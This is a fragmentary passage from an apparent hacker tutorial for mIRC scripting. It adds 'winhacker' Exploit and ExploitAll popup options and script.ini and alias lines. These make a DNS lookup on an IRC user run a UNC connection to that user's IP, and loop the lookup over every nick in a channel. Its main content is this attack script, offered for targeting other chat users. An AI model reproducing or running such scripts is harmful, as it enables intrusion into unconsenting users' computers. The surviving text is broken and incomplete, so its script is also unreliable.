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wo options you can add to work winhacker in mI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you will nee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script.ini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0=on 1:DN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set %killaddr $i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=run \\ $+ [ %killadd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hack ;)  anytime you do a dns on a nick on ir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connect to thei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 /dns ware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now on to the fun stuff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opups.ini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[lPopup] section you a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ine numbers might be different on yours, just put n21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ine is at the bottom, you are just adding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3=Exploit:/dns $$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=ExploitAll:/alldns  *note* to make this work you just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lias be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ve all you need to do is right click on any user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For the exploitall option you will need to add thi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liases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numbers like 25= depends on your own line numb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5=alld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=set %total $nick($active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=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=dns $nick($active,%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=dec %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=if %total == 0 { ha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=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hack using mIRC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